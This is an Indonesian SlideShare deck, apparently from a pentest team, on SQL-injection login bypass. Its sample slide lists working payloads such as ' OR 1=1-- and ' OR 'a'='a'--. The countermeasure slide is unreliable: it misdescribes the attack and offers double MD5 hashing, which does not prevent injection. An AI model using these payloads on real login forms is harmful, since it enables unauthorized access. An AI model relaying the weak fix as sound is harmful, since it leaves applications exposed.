SlideShare a Scribd company logo
BYPASS LOGIN SQL
TEAM PENTEST
• Adalah sebuah teknik yang dilakukan di aplikasi client
dengan cara memodifikasi perintah SQL yang ada di memori
aplikasi client.
BYPASS SQL INJECTION
• true AND true = true
true AND false = false
false AND false = false
false AND true = false
• "AND" membandingkan true dengan true. jika kedua terbanding
bernilai true, maka return true. jika salah satu atau kedua nya false,
maka return false.
• true OR true = true
true OR false = true
false OR true = true
false OR false = false
• jika salah satu TRUE, maka return akan memberikan TRUE.
FAKTOR PEMBANDING
• ‘Surabayablackhat' OR 1=1--‘
• Komentartembus’#
• katanyaheker' or true--
• NothingImposible' or 1=1--
• haruskreatifmengolahkata' OR 'a'='a'--
SAMPLE
• Andalkan Enkripsi password / merubah algoritma autentikasi login /
Sistem Filter.
Contoh Enkripsi:
Before
$input_password=$_POST[password];
After
$input_password=md5(md5($_POST[password]).md5(‘karakter
acak’));
Contoh Algoritma:
$contohsih=mysql_fetch_array($r);
if($jml_row >0 && ($contohsih[password]==$input_password))
PENANGGULANGAN
Bypass Login Authentication
REFERENSI
• https://www.netsparker.com/blog/web-
security/sql-injection-cheat-sheet/
• https://en.wikipedia.org/wiki/SQL_injection
• http://knoxd3.blogspot.co.id/20
• 14/01/cheat-sheet-for-admin-page-bypass-sql.html
• http://www.elangsakti.com/2013/03/php-teknik-
atau-cara-sederhana-untuk.html
TERIMA KASIH

More Related Content

PPTX
Surabaya blackhat - Cyber Crime Nowadays
PPTX
Android Security and Peneteration Testing
PPTX
Antisipasi Kejahatan Sosial Media (Anticipating Social Media Crime)
PPTX
Modus Operasi Kejahatan Sosial Media (Social Media Crimes Operation Mode)
PPTX
Mengenal Kejahatan Sosial Media (Introduce into Social Media Crime)
PPTX
Bug Prevention of SQL Injection
PPTX
Uploading Shell or Backdoor
PPTX
Google Dorking
Surabaya blackhat - Cyber Crime Nowadays
Android Security and Peneteration Testing
Antisipasi Kejahatan Sosial Media (Anticipating Social Media Crime)
Modus Operasi Kejahatan Sosial Media (Social Media Crimes Operation Mode)
Mengenal Kejahatan Sosial Media (Introduce into Social Media Crime)
Bug Prevention of SQL Injection
Uploading Shell or Backdoor
Google Dorking

Recently uploaded (8)

DOCX
623175210-PROSEM-KELAS-X-SEM-GANJIL.docx
PPTX
saya adalah seorang penulis awalann.pptx
PPTX
materi mata pelajaran koding dan kecerdasan artifisial
PPTX
Modul 2. Pengoperasian Pengaplikasian dan Kolaborasi Perangkat Kecerdasan Art...
PDF
Aksara nglagena_20250726_094730_0000.pdf
PPTX
Modul 1. Pengenalan Koding-KA di Dikdasmen.pptx
PDF
Labuan4D situs Exclusive Game S 1 0 t & T O 9 E 1 dari server NO 01 Gaming Asia.
PPTX
MATERI Literasi digital ASN TAHUN 2025.pptx
623175210-PROSEM-KELAS-X-SEM-GANJIL.docx
saya adalah seorang penulis awalann.pptx
materi mata pelajaran koding dan kecerdasan artifisial
Modul 2. Pengoperasian Pengaplikasian dan Kolaborasi Perangkat Kecerdasan Art...
Aksara nglagena_20250726_094730_0000.pdf
Modul 1. Pengenalan Koding-KA di Dikdasmen.pptx
Labuan4D situs Exclusive Game S 1 0 t & T O 9 E 1 dari server NO 01 Gaming Asia.
MATERI Literasi digital ASN TAHUN 2025.pptx
Ad
Ad

Bypass Login Authentication

  • 2. • Adalah sebuah teknik yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. BYPASS SQL INJECTION
  • 3. • true AND true = true true AND false = false false AND false = false false AND true = false • "AND" membandingkan true dengan true. jika kedua terbanding bernilai true, maka return true. jika salah satu atau kedua nya false, maka return false. • true OR true = true true OR false = true false OR true = true false OR false = false • jika salah satu TRUE, maka return akan memberikan TRUE. FAKTOR PEMBANDING
  • 4. • ‘Surabayablackhat' OR 1=1--‘ • Komentartembus’# • katanyaheker' or true-- • NothingImposible' or 1=1-- • haruskreatifmengolahkata' OR 'a'='a'-- SAMPLE
  • 5. • Andalkan Enkripsi password / merubah algoritma autentikasi login / Sistem Filter. Contoh Enkripsi: Before $input_password=$_POST[password]; After $input_password=md5(md5($_POST[password]).md5(‘karakter acak’)); Contoh Algoritma: $contohsih=mysql_fetch_array($r); if($jml_row >0 && ($contohsih[password]==$input_password)) PENANGGULANGAN
  • 7. REFERENSI • https://www.netsparker.com/blog/web- security/sql-injection-cheat-sheet/ • https://en.wikipedia.org/wiki/SQL_injection • http://knoxd3.blogspot.co.id/20 • 14/01/cheat-sheet-for-admin-page-bypass-sql.html • http://www.elangsakti.com/2013/03/php-teknik- atau-cara-sederhana-untuk.html